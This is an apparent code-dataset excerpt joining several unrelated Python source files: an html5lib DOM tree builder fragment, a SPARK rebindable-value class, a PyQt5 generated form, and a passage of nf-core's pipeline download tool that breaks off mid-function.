return NodeBuilder(self.dom.createDocumentFragment())
def appendChild(self, node):
from domonic.dom import HTMLDocument
if isinstance(self.dom, HTMLDocument) and isinstance(node.element, HTMLDocument):
# print('HERE IS THE PROBLEM!!!!')
# TODO - this can't be the final solution as a nested html would replace the outer
self.dom = node.element
# transfer all props from node.element to self.dom
# self.dom.__dict__.update(node.element.__dict__)
# self.dom.appendChild(node.element)
else:
self.dom.appendChild(node.element)
def testSerializer(self, element):
return testSerializer(element)
def getDocument(self):
return self.dom
def getFragment(self):
return base.TreeBuilder.getFragment(self).element
def insertText(self, data, parent=None):
data = data
if parent != self:
base.TreeBuilder.insertText(self, data, parent)
else:
# HACK: allow text nodes as children of the document node
if hasattr(self.dom, "_child_node_types"):
# pylint:disable=protected-access
if Node.TEXT_NODE not in self.dom._child_node_types:
self.dom._child_node_types = list(self.dom._child_node_types)
self.dom._child_node_types.append(Node.TEXT_NODE)
self.dom.appendChild(self.dom.createTextNode(data))
from xml.dom import minidom
implementation = minidom # DomImplementation
name = None
def testSerializer(element):
element.normalize()
rv = []
def serializeElement(element, indent=0):
if element.nodeType == Node.DOCUMENT_TYPE_NODE:
if element.name:
if element.publicId or element.systemId:
publicId = element.publicId or ""
systemId = element.systemId or ""
rv.append("""|%s<!DOCTYPE %s "%s" "%s">""" % (" " * indent, element.name, publicId, systemId))
else:
rv.append("|%s<!DOCTYPE %s>" % (" " * indent, element.name))
else:
rv.append("|%s<!DOCTYPE >" % (" " * indent,))
elif element.nodeType == Node.DOCUMENT_NODE:
rv.append("#document")
elif element.nodeType == Node.DOCUMENT_FRAGMENT_NODE:
rv.append("#document-fragment")
elif element.nodeType == Node.COMMENT_NODE:
rv.append("|%s<!-- %s -->" % (" " * indent, element.nodeValue))
elif element.nodeType == Node.TEXT_NODE:
rv.append('|%s"%s"' % (" " * indent, element.nodeValue))
else:
if hasattr(element, "namespaceURI") and element.namespaceURI is not None:
name = "%s %s" % (constants.prefixes[element.namespaceURI], element.nodeName)
else:
name = element.nodeName
rv.append("|%s<%s>" % (" " * indent, name))
if element.hasAttributes():
attributes = []
for i in range(len(element.attributes)):
attr = element.attributes.item(i)
name = attr.nodeName
value = attr.value
ns = attr.namespaceURI
if ns:
name = "%s %s" % (constants.prefixes[ns], attr.localName)
else:
name = attr.nodeName
attributes.append((name, value))
for name, value in sorted(attributes):
rv.append('|%s%s="%s"' % (" " * (indent + 2), name, value))
indent += 2
for child in element.childNodes:
serializeElement(child, indent)
serializeElement(element, 0)
return "\n".join(rv)
return locals()
# The actual means to get a module!
getDomModule = moduleFactoryFactory(getDomBuilder)
# if implementation is None:
from xml.dom import minidom
implementation = minidom
def getTreeBuilder():
return getDomModule(implementation).TreeBuilder
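# --- Usage sketch (not part of the original module; assumes html5lib is installed) ---
# The TreeBuilder returned above can be handed to html5lib's parser so that parsed
# markup is materialised through this DOM implementation.
if __name__ == "__main__":
    import html5lib
    parser = html5lib.HTMLParser(tree=getTreeBuilder())
    document = parser.parse("<p class='greeting'>hello</p>")
    print(document)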
| 36.745223 | 118 | 0.571503 |
4bd3ea42d694e0b49d6334542a235422d832e6fb | 3,699 | py | Python | src/spark/lang/rebindable.py | jbalint/spark | caccf1cd9122dd4a7dc0f26a57ee4a649056aa6f | ["CNRI-Jython"] | 1 | 2015-05-21T20:00:12.000Z | 2015-05-21T20:00:12.000Z | src/spark/lang/rebindable.py | jbalint/spark | caccf1cd9122dd4a7dc0f26a57ee4a649056aa6f | ["CNRI-Jython"] | null | null | null | src/spark/lang/rebindable.py | jbalint/spark | caccf1cd9122dd4a7dc0f26a57ee4a649056aa6f | ["CNRI-Jython"] | null | null | null | #*****************************************************************************#
#* Copyright (c) 2004-2008, SRI International. *#
#* All rights reserved. *#
#* *#
#* Redistribution and use in source and binary forms, with or without *#
#* modification, are permitted provided that the following conditions are *#
#* met: *#
#* * Redistributions of source code must retain the above copyright *#
#* notice, this list of conditions and the following disclaimer. *#
#* * Redistributions in binary form must reproduce the above copyright *#
#* notice, this list of conditions and the following disclaimer in the *#
#* documentation and/or other materials provided with the distribution. *#
#* * Neither the name of SRI International nor the names of its *#
#* contributors may be used to endorse or promote products derived from *#
#* this software without specific prior written permission. *#
#* *#
#* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS *#
#* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT *#
#* LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR *#
#* A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT *#
#* OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, *#
#* SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT *#
#* LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, *#
#* DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY *#
#* THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT *#
#* (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE *#
#* OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. *#
#*****************************************************************************#
#* "$Revision:: 129 $" *#
#* "$HeadURL:: https://svn.ai.sri.com/projects/spark/trunk/spark/src/spar#$" *#
#*****************************************************************************#
from spark.internal.version import *
from spark.internal.parse.basicvalues import value_str
from spark.internal.parse.values_common import isList
from types import TupleType as List
from types import ListType
class RebindableObject(object):
__slots__ = (
"value",
)
def __init__(self, v=None):
if v is None:
v = []
self.set_value(v)
def set_value(self, v):
if isList(v):
self.value = list(v)
else:
self.value = v
return True
def get_value(self):
if isinstance(self.value, ListType):
return List(self.value)
else:
return self.value
def add_value(self, obj):
if isinstance(self.value, ListType):
self.value.append(obj)
else:
self.value += obj
return True
def remove_value(self, obj):
if isinstance(self.value, ListType):
self.value.remove(obj)
else:
self.value -= obj
return True
def __str__(self):
return "<Rebindable:%s>"%value_str(self.get_value())
def __repr__(self):
return self.__str__()
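# --- Usage sketch (illustrative only; not part of the original SPARK sources) ---
# A RebindableObject wraps a value that can be rebound, extended, or shrunk in place;
# list-like values are handed back as immutable SPARK lists (tuples).
if __name__ == "__main__":
    rebindable = RebindableObject([1, 2])
    rebindable.add_value(3)        # internal value is now [1, 2, 3]
    rebindable.remove_value(1)     # internal value is now [2, 3]
    print(rebindable.get_value())  # prints the immutable form (2, 3)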
| 46.822785 | 80 | 0.530143 |
5d95fcf3690b9edae8391b9d2572374037645103 | 2,822 | py | Python | ui/page_elements/condition_box/boxUI.py | ArcherLuo233/election-s-prediction | 9da72cb855f6d61f9cdec6e15f7ca832629ba51a | ["MIT"] | null | null | null | ui/page_elements/condition_box/boxUI.py | ArcherLuo233/election-s-prediction | 9da72cb855f6d61f9cdec6e15f7ca832629ba51a | ["MIT"] | 1 | 2022-01-26T01:23:26.000Z | 2022-01-26T01:23:34.000Z | ui/page_elements/condition_box/boxUI.py | ArcherLuo233/election-s-prediction | 9da72cb855f6d61f9cdec6e15f7ca832629ba51a | ["MIT"] | 1 | 2021-11-08T10:58:23.000Z | 2021-11-08T10:58:23.000Z | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'box.ui'
#
# Created by: PyQt5 UI code generator 5.15.0
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(276, 186)
font = QtGui.QFont()
font.setFamily("华文新魏")
font.setPointSize(12)
Form.setFont(font)
self.horizontalLayout = QtWidgets.QHBoxLayout(Form)
self.horizontalLayout.setContentsMargins(0, 0, 0, 0)
self.horizontalLayout.setSpacing(0)
self.horizontalLayout.setObjectName("horizontalLayout")
self.frame = QtWidgets.QFrame(Form)
self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame.setFrameShadow(QtWidgets.QFrame.Plain)
self.frame.setObjectName("frame")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.frame)
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
self.comboBox = QtWidgets.QComboBox(self.frame)
font = QtGui.QFont()
font.setFamily("华文新魏")
font.setPointSize(17)
self.comboBox.setFont(font)
self.comboBox.setObjectName("comboBox")
self.horizontalLayout_2.addWidget(self.comboBox)
self.lineEdit = QtWidgets.QLineEdit(self.frame)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.lineEdit.sizePolicy().hasHeightForWidth())
self.lineEdit.setSizePolicy(sizePolicy)
font = QtGui.QFont()
font.setFamily("华文新魏")
font.setPointSize(17)
self.lineEdit.setFont(font)
self.lineEdit.setObjectName("lineEdit")
self.horizontalLayout_2.addWidget(self.lineEdit)
self.btn_delete = QtWidgets.QPushButton(self.frame)
font = QtGui.QFont()
font.setFamily("华文新魏")
font.setPointSize(14)
self.btn_delete.setFont(font)
self.btn_delete.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.btn_delete.setObjectName("btn_delete")
self.horizontalLayout_2.addWidget(self.btn_delete)
self.horizontalLayout.addWidget(self.frame)
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form", "Form"))
self.lineEdit.setPlaceholderText(_translate("Form", "关键字"))
self.btn_delete.setText(_translate("Form", "删除"))
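# --- Usage sketch (illustrative; this block is not generated by pyuic5) ---
# The compiled Ui_Form is attached to a plain QWidget with setupUi(), following the
# standard PyQt5 pattern for classes produced from Qt Designer .ui files.
if __name__ == "__main__":
    import sys
    app = QtWidgets.QApplication(sys.argv)
    form = QtWidgets.QWidget()
    ui = Ui_Form()
    ui.setupUi(form)
    form.show()
    sys.exit(app.exec_())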
| 40.898551 | 104 | 0.692417 |
7f03459cf6973a6ea31c6e1c70a57d0d74a1c4d9 | 36,404 | py | Python | nf_core/download.py | krokicki/tools | 901334d94cbf2ffce0c2e6c20de4354a7fe59b09 | ["MIT"] | 142 | 2018-02-14T18:01:28.000Z | 2022-03-25T03:25:34.000Z | nf_core/download.py | krokicki/tools | 901334d94cbf2ffce0c2e6c20de4354a7fe59b09 | ["MIT"] | 1,267 | 2018-02-14T21:12:51.000Z | 2022-03-31T17:24:09.000Z | nf_core/download.py | krokicki/tools | 901334d94cbf2ffce0c2e6c20de4354a7fe59b09 | ["MIT"] | 127 | 2018-02-13T17:01:07.000Z | 2022-03-25T03:25:36.000Z | #!/usr/bin/env python
"""Downloads a nf-core pipeline to the local file system."""
from __future__ import print_function
from io import BytesIO
import logging
import hashlib
import os
import questionary
import re
import requests
import requests_cache
import shutil
import subprocess
import sys
import tarfile
import concurrent.futures
import rich
import rich.progress
from zipfile import ZipFile
import nf_core
import nf_core.list
import nf_core.utils
log = logging.getLogger(__name__)
stderr = rich.console.Console(
stderr=True, style="dim", highlight=False, force_terminal=nf_core.utils.rich_force_colors()
)
class DownloadProgress(rich.progress.Progress):
"""Custom Progress bar class, allowing us to have two progress
bars with different columns / layouts.
"""
def get_renderables(self):
for task in self.tasks:
if task.fields.get("progress_type") == "summary":
self.columns = (
"[magenta]{task.description}",
rich.progress.BarColumn(bar_width=None),
"[progress.percentage]{task.percentage:>3.0f}%",
"•",
"[green]{task.completed}/{task.total} completed",
)
if task.fields.get("progress_type") == "download":
self.columns = (
"[blue]{task.description}",
rich.progress.BarColumn(bar_width=None),
"[progress.percentage]{task.percentage:>3.1f}%",
"•",
rich.progress.DownloadColumn(),
"•",
rich.progress.TransferSpeedColumn(),
)
if task.fields.get("progress_type") == "singularity_pull":
self.columns = (
"[magenta]{task.description}",
"[blue]{task.fields[current_log]}",
rich.progress.BarColumn(bar_width=None),
)
yield self.make_tasks_table([task])
class DownloadWorkflow(object):
"""Downloads a nf-core workflow from GitHub to the local file system.
Can also download its Singularity container image if required.
Args:
pipeline (str): A nf-core pipeline name.
revision (str): The workflow revision to download, like `1.0`. Defaults to None.
singularity (bool): Flag, if the Singularity container should be downloaded as well. Defaults to False.
outdir (str): Path to the local download directory. Defaults to None.
"""
def __init__(
self,
pipeline=None,
revision=None,
outdir=None,
compress_type=None,
force=False,
container=None,
singularity_cache_only=False,
parallel_downloads=4,
):
self.pipeline = pipeline
self.revision = revision
self.outdir = outdir
self.output_filename = None
self.compress_type = compress_type
self.force = force
self.container = container
self.singularity_cache_only = singularity_cache_only
self.parallel_downloads = parallel_downloads
self.wf_revisions = {}
self.wf_branches = {}
self.wf_sha = None
self.wf_download_url = None
self.nf_config = dict()
self.containers = list()
# Fetch remote workflows
self.wfs = nf_core.list.Workflows()
self.wfs.get_remote_workflows()
def download_workflow(self):
"""Starts a nf-core workflow download."""
# Get workflow details
try:
self.prompt_pipeline_name()
self.pipeline, self.wf_revisions, self.wf_branches = nf_core.utils.get_repo_releases_branches(
self.pipeline, self.wfs
)
self.prompt_revision()
self.get_revision_hash()
self.prompt_container_download()
self.prompt_use_singularity_cachedir()
self.prompt_singularity_cachedir_only()
self.prompt_compression_type()
except AssertionError as e:
log.critical(e)
sys.exit(1)
summary_log = [f"Pipeline revision: '{self.revision}'", f"Pull containers: '{self.container}'"]
if self.container == "singularity" and os.environ.get("NXF_SINGULARITY_CACHEDIR") is not None:
summary_log.append(
"Using [blue]$NXF_SINGULARITY_CACHEDIR[/]': {}".format(os.environ["NXF_SINGULARITY_CACHEDIR"])
)
# Set an output filename now that we have the outdir
if self.compress_type is not None:
self.output_filename = f"{self.outdir}.{self.compress_type}"
summary_log.append(f"Output file: '{self.output_filename}'")
else:
summary_log.append(f"Output directory: '{self.outdir}'")
# Check that the outdir doesn't already exist
if os.path.exists(self.outdir):
if not self.force:
log.error(f"Output directory '{self.outdir}' already exists (use [red]--force[/] to overwrite)")
sys.exit(1)
log.warning(f"Deleting existing output directory: '{self.outdir}'")
shutil.rmtree(self.outdir)
# Check that compressed output file doesn't already exist
if self.output_filename and os.path.exists(self.output_filename):
if not self.force:
log.error(f"Output file '{self.output_filename}' already exists (use [red]--force[/] to overwrite)")
sys.exit(1)
log.warning(f"Deleting existing output file: '{self.output_filename}'")
os.remove(self.output_filename)
# Summary log
log.info("Saving '{}'\n {}".format(self.pipeline, "\n ".join(summary_log)))
# Download the pipeline files
log.info("Downloading workflow files from GitHub")
self.download_wf_files()
# Download the centralised configs
log.info("Downloading centralised configs from GitHub")
self.download_configs()
try:
self.wf_use_local_configs()
except FileNotFoundError as e:
log.error("Error editing pipeline config file to use local configs!")
log.critical(e)
sys.exit(1)
# Download the singularity images
if self.container == "singularity":
self.find_container_images()
try:
self.get_singularity_images()
except OSError as e:
log.critical(f"[red]{e}[/]")
sys.exit(1)
# Compress into an archive
if self.compress_type is not None:
log.info("Compressing download..")
self.compress_download()
def prompt_pipeline_name(self):
"""Prompt for the pipeline name if not set with a flag"""
if self.pipeline is None:
stderr.print("Specify the name of a nf-core pipeline or a GitHub repository name (user/repo).")
self.pipeline = nf_core.utils.prompt_remote_pipeline_name(self.wfs)
def prompt_revision(self):
"""Prompt for pipeline revision / branch"""
# Prompt user for revision tag if '--revision' was not set
if self.revision is None:
self.revision = nf_core.utils.prompt_pipeline_release_branch(self.wf_revisions, self.wf_branches)
def get_revision_hash(self):
"""Find specified revision / branch hash"""
# Branch
if self.revision in self.wf_branches.keys():
self.wf_sha = self.wf_branches[self.revision]
# Revision
else:
for r in self.wf_revisions:
if r["tag_name"] == self.revision:
self.wf_sha = r["tag_sha"]
break
# Can't find the revisions or branch - throw an error
else:
log.info(
"Available {} revisions: '{}'".format(
self.pipeline, "', '".join([r["tag_name"] for r in self.wf_revisions])
)
)
log.info("Available {} branches: '{}'".format(self.pipeline, "', '".join(self.wf_branches.keys())))
raise AssertionError(
"Not able to find revision / branch '{}' for {}".format(self.revision, self.pipeline)
)
# Set the outdir
if not self.outdir:
self.outdir = "{}-{}".format(self.pipeline.replace("/", "-").lower(), self.revision)
# Set the download URL and return
self.wf_download_url = "https://github.com/{}/archive/{}.zip".format(self.pipeline, self.wf_sha)
def prompt_container_download(self):
"""Prompt whether to download container images or not"""
if self.container is None:
stderr.print("\nIn addition to the pipeline code, this tool can download software containers.")
self.container = questionary.select(
"Download software container images:",
choices=["none", "singularity"],
style=nf_core.utils.nfcore_question_style,
).unsafe_ask()
def prompt_use_singularity_cachedir(self):
"""Prompt about using $NXF_SINGULARITY_CACHEDIR if not already set"""
if (
self.container == "singularity"
and os.environ.get("NXF_SINGULARITY_CACHEDIR") is None
and stderr.is_interactive # Use rich auto-detection of interactive shells
):
stderr.print(
"\nNextflow and nf-core can use an environment variable called [blue]$NXF_SINGULARITY_CACHEDIR[/] that is a path to a directory where remote Singularity images are stored. "
"This allows downloaded images to be cached in a central location."
)
if rich.prompt.Confirm.ask(
f"[blue bold]?[/] [bold]Define [blue not bold]$NXF_SINGULARITY_CACHEDIR[/] for a shared Singularity image download folder?[/]"
):
# Prompt user for a cache directory path
cachedir_path = None
while cachedir_path is None:
prompt_cachedir_path = questionary.path(
"Specify the path:", only_directories=True, style=nf_core.utils.nfcore_question_style
).unsafe_ask()
cachedir_path = os.path.abspath(os.path.expanduser(prompt_cachedir_path))
if prompt_cachedir_path == "":
log.error(f"Not using [blue]$NXF_SINGULARITY_CACHEDIR[/]")
cachedir_path = False
elif not os.path.isdir(cachedir_path):
log.error(f"'{cachedir_path}' is not a directory.")
cachedir_path = None
if cachedir_path:
os.environ["NXF_SINGULARITY_CACHEDIR"] = cachedir_path
# Ask if user wants this set in their .bashrc
bashrc_path = os.path.expanduser("~/.bashrc")
if not os.path.isfile(bashrc_path):
bashrc_path = os.path.expanduser("~/.bash_profile")
if not os.path.isfile(bashrc_path):
bashrc_path = False
if bashrc_path:
stderr.print(
f"\nSo that [blue]$NXF_SINGULARITY_CACHEDIR[/] is always defined, you can add it to your [blue not bold]~/{os.path.basename(bashrc_path)}[/] file ."
"This will then be autmoatically set every time you open a new terminal. We can add the following line to this file for you: \n"
f'[blue]export NXF_SINGULARITY_CACHEDIR="{cachedir_path}"[/]'
)
append_to_file = rich.prompt.Confirm.ask(
f"[blue bold]?[/] [bold]Add to [blue not bold]~/{os.path.basename(bashrc_path)}[/] ?[/]"
)
if append_to_file:
with open(os.path.expanduser(bashrc_path), "a") as f:
f.write(
"\n\n#######################################\n"
f"## Added by `nf-core download` v{nf_core.__version__} ##\n"
+ f'export NXF_SINGULARITY_CACHEDIR="{cachedir_path}"'
+ "\n#######################################\n"
)
log.info(f"Successfully wrote to [blue]{bashrc_path}[/]")
log.warning(
"You will need reload your terminal after the download completes for this to take effect."
)
def prompt_singularity_cachedir_only(self):
"""Ask if we should *only* use $NXF_SINGULARITY_CACHEDIR without copying into target"""
if (
self.singularity_cache_only is None
and self.container == "singularity"
and os.environ.get("NXF_SINGULARITY_CACHEDIR") is not None
):
stderr.print(
"\nIf you are working on the same system where you will run Nextflow, you can leave the downloaded images in the "
"[blue not bold]$NXF_SINGULARITY_CACHEDIR[/] folder, Nextflow will automatically find them. "
"However if you will transfer the downloaded files to a different system then they should be copied to the target folder."
)
self.singularity_cache_only = rich.prompt.Confirm.ask(
f"[blue bold]?[/] [bold]Copy singularity images from [blue not bold]$NXF_SINGULARITY_CACHEDIR[/] to the target folder?[/]"
)
# Sanity check, for when passed as a cli flag
if self.singularity_cache_only and self.container != "singularity":
raise AssertionError("Command has '--singularity-cache-only' set, but '--container' is not 'singularity'")
def prompt_compression_type(self):
"""Ask user if we should compress the downloaded files"""
if self.compress_type is None:
stderr.print(
"\nIf transferring the downloaded files to another system, it can be convenient to have everything compressed in a single file."
)
if self.container == "singularity":
stderr.print(
"[bold]This is [italic]not[/] recommended when downloading Singularity images, as it can take a long time and saves very little space."
)
self.compress_type = questionary.select(
"Choose compression type:",
choices=[
"none",
"tar.gz",
"tar.bz2",
"zip",
],
style=nf_core.utils.nfcore_question_style,
).unsafe_ask()
# Correct type for no-compression
if self.compress_type == "none":
self.compress_type = None
def download_wf_files(self):
"""Downloads workflow files from GitHub to the :attr:`self.outdir`."""
log.debug("Downloading {}".format(self.wf_download_url))
# Download GitHub zip file into memory and extract
url = requests.get(self.wf_download_url)
zipfile = ZipFile(BytesIO(url.content))
zipfile.extractall(self.outdir)
# Rename the internal directory name to be more friendly
gh_name = "{}-{}".format(self.pipeline, self.wf_sha).split("/")[-1]
os.rename(os.path.join(self.outdir, gh_name), os.path.join(self.outdir, "workflow"))
# Make downloaded files executable
for dirpath, subdirs, filelist in os.walk(os.path.join(self.outdir, "workflow")):
for fname in filelist:
os.chmod(os.path.join(dirpath, fname), 0o775)
def download_configs(self):
"""Downloads the centralised config profiles from nf-core/configs to :attr:`self.outdir`."""
configs_zip_url = "https://github.com/nf-core/configs/archive/master.zip"
configs_local_dir = "configs-master"
log.debug("Downloading {}".format(configs_zip_url))
# Download GitHub zip file into memory and extract
url = requests.get(configs_zip_url)
zipfile = ZipFile(BytesIO(url.content))
zipfile.extractall(self.outdir)
# Rename the internal directory name to be more friendly
os.rename(os.path.join(self.outdir, configs_local_dir), os.path.join(self.outdir, "configs"))
# Make downloaded files executable
for dirpath, subdirs, filelist in os.walk(os.path.join(self.outdir, "configs")):
for fname in filelist:
os.chmod(os.path.join(dirpath, fname), 0o775)
def wf_use_local_configs(self):
"""Edit the downloaded nextflow.config file to use the local config files"""
nfconfig_fn = os.path.join(self.outdir, "workflow", "nextflow.config")
find_str = "https://raw.githubusercontent.com/nf-core/configs/${params.custom_config_version}"
repl_str = "${projectDir}/../configs/"
log.debug("Editing 'params.custom_config_base' in '{}'".format(nfconfig_fn))
# Load the nextflow.config file into memory
with open(nfconfig_fn, "r") as nfconfig_fh:
nfconfig = nfconfig_fh.read()
# Replace the target string
log.debug(f"Replacing '{find_str}' with '{repl_str}'")
nfconfig = nfconfig.replace(find_str, repl_str)
# Append the singularity.cacheDir to the end if we need it
if self.container == "singularity" and not self.singularity_cache_only:
nfconfig += (
f"\n\n// Added by `nf-core download` v{nf_core.__version__} //\n"
+ 'singularity.cacheDir = "${projectDir}/../singularity-images/"'
+ "\n///////////////////////////////////////"
)
# Write the file out again
log.debug(f"Updating '{nfconfig_fn}'")
with open(nfconfig_fn, "w") as nfconfig_fh:
nfconfig_fh.write(nfconfig)
def find_container_images(self):
"""Find container image names for workflow.
Starts by using `nextflow config` to pull out any process.container
declarations. This works for DSL1.
Second, we look for DSL2 containers. These can't be found with
`nextflow config` at the time of writing, so we scrape the pipeline files.
"""
log.debug("Fetching container names for workflow")
containers_raw = []
# Use linting code to parse the pipeline nextflow config
self.nf_config = nf_core.utils.fetch_wf_config(os.path.join(self.outdir, "workflow"))
# Find any config variables that look like a container
for k, v in self.nf_config.items():
if k.startswith("process.") and k.endswith(".container"):
containers_raw.append(v.strip('"').strip("'"))
# Recursive search through any DSL2 module files for container spec lines.
for subdir, dirs, files in os.walk(os.path.join(self.outdir, "workflow", "modules")):
for file in files:
if file.endswith(".nf"):
with open(os.path.join(subdir, file), "r") as fh:
# Look for any lines with `container = "xxx"`
matches = []
for line in fh:
match = re.match(r"\s*container\s+[\"']([^\"']+)[\"']", line)
if match:
matches.append(match.group(1))
# If we have matches, save the first one that starts with http
for m in matches:
if m.startswith("http"):
containers_raw.append(m.strip('"').strip("'"))
break
# If we get here then we didn't call break - just save the first match
else:
if len(matches) > 0:
containers_raw.append(matches[0].strip('"').strip("'"))
# Remove duplicates and sort
containers_raw = sorted(list(set(containers_raw)))
# Strip any container names that have dynamic names - eg. {params.foo}
self.containers = []
for container in containers_raw:
if "{" in container and "}" in container:
log.error(
f"[red]Container name [green]'{container}'[/] has dynamic Nextflow logic in name - skipping![/]"
)
log.info("Please use a 'nextflow run' command to fetch this container. Ask on Slack if you need help.")
else:
self.containers.append(container)
log.info("Found {} container{}".format(len(self.containers), "s" if len(self.containers) > 1 else ""))
def get_singularity_images(self):
"""Loop through container names and download Singularity images"""
if len(self.containers) == 0:
log.info("No container names found in workflow")
else:
with DownloadProgress() as progress:
task = progress.add_task("all_containers", total=len(self.containers), progress_type="summary")
# Organise containers based on what we need to do with them
containers_exist = []
containers_cache = []
containers_download = []
containers_pull = []
for container in self.containers:
# Fetch the output and cached filenames for this container
out_path, cache_path = self.singularity_image_filenames(container)
# Check that the directories exist
out_path_dir = os.path.dirname(out_path)
if not os.path.isdir(out_path_dir):
log.debug(f"Output directory not found, creating: {out_path_dir}")
os.makedirs(out_path_dir)
if cache_path:
cache_path_dir = os.path.dirname(cache_path)
if not os.path.isdir(cache_path_dir):
log.debug(f"Cache directory not found, creating: {cache_path_dir}")
os.makedirs(cache_path_dir)
# We already have the target file in place, return
if os.path.exists(out_path):
containers_exist.append(container)
continue
# We have a copy of this in the NXF_SINGULARITY_CACHE dir
if cache_path and os.path.exists(cache_path):
containers_cache.append([container, out_path, cache_path])
continue
# Direct download within Python
if container.startswith("http"):
containers_download.append([container, out_path, cache_path])
continue
# Pull using singularity
containers_pull.append([container, out_path, cache_path])
# Exit if we need to pull images and Singularity is not installed
if len(containers_pull) > 0 and shutil.which("singularity") is None:
raise OSError("Singularity is needed to pull images, but it is not installed")
# Go through each method of fetching containers in order
for container in containers_exist:
progress.update(task, description="Image file exists")
progress.update(task, advance=1)
for container in containers_cache:
progress.update(task, description=f"Copying singularity images from cache")
self.singularity_copy_cache_image(*container)
progress.update(task, advance=1)
with concurrent.futures.ThreadPoolExecutor(max_workers=self.parallel_downloads) as pool:
progress.update(task, description="Downloading singularity images")
# Kick off concurrent downloads
future_downloads = [
pool.submit(self.singularity_download_image, *container, progress)
for container in containers_download
]
# Make ctrl-c work with multi-threading
self.kill_with_fire = False
try:
# Iterate over each threaded download, waiting for them to finish
for future in concurrent.futures.as_completed(future_downloads):
try:
future.result()
except Exception:
raise
else:
try:
progress.update(task, advance=1)
except Exception as e:
log.error(f"Error updating progress bar: {e}")
except KeyboardInterrupt:
# Cancel the future threads that haven't started yet
for future in future_downloads:
future.cancel()
# Set the variable that the threaded function looks for
# Will trigger an exception from each thread
self.kill_with_fire = True
# Re-raise exception on the main thread
raise
for container in containers_pull:
progress.update(task, description="Pulling singularity images")
try:
self.singularity_pull_image(*container, progress)
except RuntimeWarning as r:
# Raise exception if this is not possible
log.error("Not able to pull image. Service might be down or internet connection is dead.")
raise r
progress.update(task, advance=1)
def singularity_image_filenames(self, container):
"""Check Singularity cache for image, copy to destination folder if found.
Args:
container (str): A pipeline's container name. Can be direct download URL
or a Docker Hub repository ID.
Returns:
results (bool, str): Returns True if we have the image in the target location.
Returns a download path if not.
"""
# Generate file paths
# Based on simpleName() function in Nextflow code:
# https://github.com/nextflow-io/nextflow/blob/671ae6d85df44f906747c16f6d73208dbc402d49/modules/nextflow/src/main/groovy/nextflow/container/SingularityCache.groovy#L69-L94
out_name = container
# Strip URI prefix
out_name = re.sub(r"^.*:\/\/", "", out_name)
# Detect file extension
extension = ".img"
if ".sif:" in out_name:
extension = ".sif"
out_name = out_name.replace(".sif:", "-")
elif out_name.endswith(".sif"):
extension = ".sif"
out_name = out_name[:-4]
# Strip : and / characters
out_name = out_name.replace("/", "-").replace(":", "-")
# Add file extension
out_name = out_name + extension
# Full destination and cache paths
out_path = os.path.abspath(os.path.join(self.outdir, "singularity-images", out_name))
cache_path = None
if os.environ.get("NXF_SINGULARITY_CACHEDIR"):
cache_path = os.path.join(os.environ["NXF_SINGULARITY_CACHEDIR"], out_name)
# Use only the cache - set this as the main output path
if self.singularity_cache_only:
out_path = cache_path
cache_path = None
elif self.singularity_cache_only:
raise FileNotFoundError("'--singularity-cache' specified but no '$NXF_SINGULARITY_CACHEDIR' set!")
return (out_path, cache_path)
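        # Illustrative example of the mangling above (not from the original code):
        #   container: https://depot.galaxyproject.org/singularity/fastqc:0.11.9--0
        #   out_name:  depot.galaxyproject.org-singularity-fastqc-0.11.9--0.img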
def singularity_copy_cache_image(self, container, out_path, cache_path):
"""Copy Singularity image from NXF_SINGULARITY_CACHEDIR to target folder."""
# Copy to destination folder if we have a cached version
if cache_path and os.path.exists(cache_path):
log.debug("Copying {} from cache: '{}'".format(container, os.path.basename(out_path)))
shutil.copyfile(cache_path, out_path)
def singularity_download_image(self, container, out_path, cache_path, progress):
"""Download a singularity image from the web.
Use native Python to download the file.
Args:
container (str): A pipeline's container name. Usually it is of similar format
to ``https://depot.galaxyproject.org/singularity/name:version``
out_path (str): The final target output path
cache_path (str, None): The NXF_SINGULARITY_CACHEDIR path if set, None if not
progress (Progress): Rich progress bar instance to add tasks to.
"""
log.debug(f"Downloading Singularity image: '{container}'")
# Set output path to save file to
output_path = cache_path or out_path
output_path_tmp = f"{output_path}.partial"
log.debug(f"Downloading to: '{output_path_tmp}'")
# Set up progress bar
nice_name = container.split("/")[-1][:50]
task = progress.add_task(nice_name, start=False, total=False, progress_type="download")
try:
# Delete temporary file if it already exists
if os.path.exists(output_path_tmp):
os.remove(output_path_tmp)
# Open file handle and download
with open(output_path_tmp, "wb") as fh:
# Disable caching as this breaks streamed downloads
with requests_cache.disabled():
r = requests.get(container, allow_redirects=True, stream=True, timeout=60 * 5)
filesize = r.headers.get("Content-length")
if filesize:
progress.update(task, total=int(filesize))
progress.start_task(task)
# Stream download
for data in r.iter_content(chunk_size=4096):
# Check that the user didn't hit ctrl-c
if self.kill_with_fire:
raise KeyboardInterrupt
